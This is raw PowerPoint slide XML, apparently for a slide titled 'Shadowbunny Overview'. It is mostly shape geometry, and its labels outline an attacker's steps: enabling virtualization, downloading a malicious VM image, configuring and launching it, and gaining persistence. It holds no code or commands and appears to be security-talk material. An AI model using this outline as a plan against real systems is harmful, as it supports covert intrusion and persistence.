        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphic 19" descr="Gears">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120EC892-25E2-460F-B6CF-6C24C3D3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0407" y="3115234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5DD55E-6B59-4E78-91C9-7937DEED3FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366879" y="4084765"/>
            <a:ext cx="172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Configuration &amp; Launch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759155-F288-4FF2-AF53-17E1B886C028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3115187" y="3203049"/>
            <a:ext cx="1120589" cy="727042"/>
            <a:chOff x="3115187" y="3203049"/>
            <a:chExt cx="1120589" cy="72704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9103D1-6FA6-4DC6-ABC9-1A7D3380F7D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3261351" y="3203049"/>
              <a:ext cx="828261" cy="597213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                <a:gd name="connsiteY9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7700" h="438150">
                  <a:moveTo>
                    <a:pt x="590550" y="381000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57150" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590550" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="647700" y="38100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="647700" y="17058"/>
                    <a:pt x="630642" y="0"/>
                    <a:pt x="6096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38150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647700" y="4381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BADD70-BD0E-4BBA-9ACC-FE24FE0BDB42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3115187" y="3852194"/>
              <a:ext cx="1120589" cy="77897"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                  <a:moveTo>
                    <a:pt x="495300" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495300" y="9525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="495627" y="14459"/>
                    <a:pt x="491891" y="18723"/>
                    <a:pt x="486957" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486564" y="19076"/>
                    <a:pt x="486168" y="19076"/>
                    <a:pt x="485775" y="19050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="390525" y="19050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="385591" y="19377"/>
                    <a:pt x="381327" y="15641"/>
                    <a:pt x="381000" y="10707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380974" y="10314"/>
                    <a:pt x="380974" y="9918"/>
                    <a:pt x="381000" y="9525"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="381000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0" y="40092"/>
                    <a:pt x="17058" y="57150"/>
                    <a:pt x="38100" y="57150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="838200" y="57150"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="859242" y="57150"/>
                    <a:pt x="876300" y="40092"/>
                    <a:pt x="876300" y="19050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="87630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7B68EB9-B158-451A-A785-458A878609C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453833" y="3373362"/>
            <a:ext cx="441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VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32" descr="Infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2EAC1B-119B-4691-B8A8-93E67B389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5524" y="3044455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A36B05-A210-4CFF-955D-B390B8300E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9786168" y="4084765"/>
            <a:ext cx="141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Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F80F33-D409-4187-89FE-DCFEF4994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57426" y="3098744"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Graphic 38" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B751AE-D99A-4410-9E9F-96858E803C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01344" y="3093028"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Graphic 40" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F74124-14EC-4C60-B56C-112007AFEB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9052" y="3070257"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Graphic 42" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51903C0B-539F-4B30-BC76-3E23956CB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96353" y="3044455"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Graphic 29" descr="Bunny face">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F683D7-BD3B-4592-8D6F-D629F90F6B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28451" y="2551779"/>
            <a:ext cx="657250" cy="6572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B9472FF-582A-43FB-97CE-2A84604CB36C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5396782" y="3203049"/>
            <a:ext cx="1120589" cy="727042"/>
            <a:chOff x="5396782" y="3203049"/>
            <a:chExt cx="1120589" cy="727042"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Graphic 12" descr="Download from cloud">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47C68AF3-ED68-4F37-B2BF-2614E078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20934" y="3264724"/>
              <a:ext cx="472285" cy="472285"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="45" name="Graphic 10" descr="Internet">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325A45D7-4CA0-41BB-9BAF-33DEE03E99F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5396782" y="3203049"/>
              <a:ext cx="1120589" cy="727042"/>
              <a:chOff x="3570431" y="3314699"/>
              <a:chExt cx="876300" cy="533400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48805DA-D557-4E7A-8943-25DAD325D9BE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3684731" y="3314699"/>
                <a:ext cx="647700" cy="438150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                  <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                  <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                  <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                  <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                  <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                  <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                  <a:gd name="connsiteY9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7700" h="438150">
                    <a:moveTo>
                      <a:pt x="590550" y="381000"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57150" y="381000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57150" y="57150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590550" y="57150"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="647700" y="38100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="647700" y="17058"/>
                      <a:pt x="630642" y="0"/>
                      <a:pt x="609600" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38100" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17058" y="0"/>
                      <a:pt x="0" y="17058"/>
                      <a:pt x="0" y="38100"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="438150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647700" y="43815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7C4DA4E-B119-4AFA-BB5D-22EC95D3F041}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3570431" y="3790949"/>
                <a:ext cx="876300" cy="57150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                  <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                  <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                  <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                  <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                  <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                  <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                  <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                  <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                  <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                  <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                  <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                  <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                    <a:moveTo>
                      <a:pt x="495300" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="495300" y="9525"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="495627" y="14459"/>
                      <a:pt x="491891" y="18723"/>
                      <a:pt x="486957" y="19050"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486564" y="19076"/>
                      <a:pt x="486168" y="19076"/>
                      <a:pt x="485775" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="390525" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="385591" y="19377"/>
                      <a:pt x="381327" y="15641"/>
                      <a:pt x="381000" y="10707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380974" y="10314"/>
                      <a:pt x="380974" y="9918"/>
                      <a:pt x="381000" y="9525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="381000" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19050"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="40092"/>
                      <a:pt x="17058" y="57150"/>
                      <a:pt x="38100" y="57150"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="838200" y="57150"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="859242" y="57150"/>
                      <a:pt x="876300" y="40092"/>
                      <a:pt x="876300" y="19050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8763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747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7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3C09-DB2B-4B44-9482-73EB3AB0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Shadowbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Devil face outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2002367-DA7D-4B69-824A-CB58AB651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982" y="3194167"/>
            <a:ext cx="774463" cy="77446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591D21-5C19-4D5A-B8EC-01172702C650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753725" y="4084765"/>
            <a:ext cx="117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8CD11-B738-48B4-A24D-86E139BA3467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2977336" y="4084765"/>
            <a:ext cx="14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Install/Enable</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtualization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30C2E-B5F3-4493-A6D8-A91352BFCAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920792" y="4041482"/>
            <a:ext cx="216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Download Malicious VM Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Graphic 19" descr="Gears">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120EC892-25E2-460F-B6CF-6C24C3D3E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0407" y="3115234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5DD55E-6B59-4E78-91C9-7937DEED3FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366879" y="4084765"/>
            <a:ext cx="172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Configuration &amp; Launch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759155-F288-4FF2-AF53-17E1B886C028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3115187" y="3203049"/>
            <a:ext cx="1120589" cy="727042"/>
            <a:chOff x="3115187" y="3203049"/>
            <a:chExt cx="1120589" cy="72704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9103D1-6FA6-4DC6-ABC9-1A7D3380F7D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3261351" y="3203049"/>
              <a:ext cx="828261" cy="597213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 590550 w 647700"/>
                <a:gd name="connsiteY0" fmla="*/ 381000 h 438150"/>
                <a:gd name="connsiteX1" fmla="*/ 57150 w 647700"/>
                <a:gd name="connsiteY1" fmla="*/ 381000 h 438150"/>
                <a:gd name="connsiteX2" fmla="*/ 57150 w 647700"/>
                <a:gd name="connsiteY2" fmla="*/ 57150 h 438150"/>
                <a:gd name="connsiteX3" fmla="*/ 590550 w 647700"/>
                <a:gd name="connsiteY3" fmla="*/ 57150 h 438150"/>
                <a:gd name="connsiteX4" fmla="*/ 647700 w 647700"/>
                <a:gd name="connsiteY4" fmla="*/ 38100 h 438150"/>
                <a:gd name="connsiteX5" fmla="*/ 609600 w 647700"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 438150"/>
                <a:gd name="connsiteX6" fmla="*/ 38100 w 647700"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 438150"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 647700"/>
                <a:gd name="connsiteY7" fmla="*/ 38100 h 438150"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 647700"/>
                <a:gd name="connsiteY8" fmla="*/ 438150 h 438150"/>
                <a:gd name="connsiteX9" fmla="*/ 647700 w 647700"/>
                <a:gd name="connsiteY9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7700" h="438150">
                  <a:moveTo>
                    <a:pt x="590550" y="381000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57150" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590550" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="647700" y="38100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="647700" y="17058"/>
                    <a:pt x="630642" y="0"/>
                    <a:pt x="609600" y="0"/>
                  </a:cubicBez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38150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647700" y="4381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BADD70-BD0E-4BBA-9ACC-FE24FE0BDB42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3115187" y="3852194"/>
              <a:ext cx="1120589" cy="77897"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 495300 w 876300"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX1" fmla="*/ 495300 w 876300"/>
                <a:gd name="connsiteY1" fmla="*/ 9525 h 57150"/>
                <a:gd name="connsiteX2" fmla="*/ 486957 w 876300"/>
                <a:gd name="connsiteY2" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX3" fmla="*/ 485775 w 876300"/>
                <a:gd name="connsiteY3" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX4" fmla="*/ 390525 w 876300"/>
                <a:gd name="connsiteY4" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX5" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY5" fmla="*/ 10707 h 57150"/>
                <a:gd name="connsiteX6" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY6" fmla="*/ 9525 h 57150"/>
                <a:gd name="connsiteX7" fmla="*/ 381000 w 876300"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 876300"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 57150"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 876300"/>
                <a:gd name="connsiteY9" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX10" fmla="*/ 38100 w 876300"/>
                <a:gd name="connsiteY10" fmla="*/ 57150 h 57150"/>
                <a:gd name="connsiteX11" fmla="*/ 838200 w 876300"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 57150"/>
                <a:gd name="connsiteX12" fmla="*/ 876300 w 876300"/>
                <a:gd name="connsiteY12" fmla="*/ 19050 h 57150"/>
                <a:gd name="connsiteX13" fmla="*/ 876300 w 876300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6300" h="57150">
                  <a:moveTo>
                    <a:pt x="495300" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495300" y="9525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="495627" y="14459"/>
                    <a:pt x="491891" y="18723"/>
                    <a:pt x="486957" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486564" y="19076"/>
                    <a:pt x="486168" y="19076"/>
                    <a:pt x="485775" y="19050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="390525" y="19050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="385591" y="19377"/>
                    <a:pt x="381327" y="15641"/>
                    <a:pt x="381000" y="10707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380974" y="10314"/>
                    <a:pt x="380974" y="9918"/>
                    <a:pt x="381000" y="9525"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="381000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40092"/>
                    <a:pt x="17058" y="57150"/>
                    <a:pt x="38100" y="57150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="838200" y="57150"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="859242" y="57150"/>
                    <a:pt x="876300" y="40092"/>
                    <a:pt x="876300" y="19050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="87630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7B68EB9-B158-451A-A785-458A878609C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453833" y="3373362"/>
            <a:ext cx="441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VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32" descr="Infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2EAC1B-119B-4691-B8A8-93E67B389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5524" y="3044455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A36B05-A210-4CFF-955D-B390B8300E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9786168" y="4084765"/>
            <a:ext cx="1413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Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36" descr="Arrow Right">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
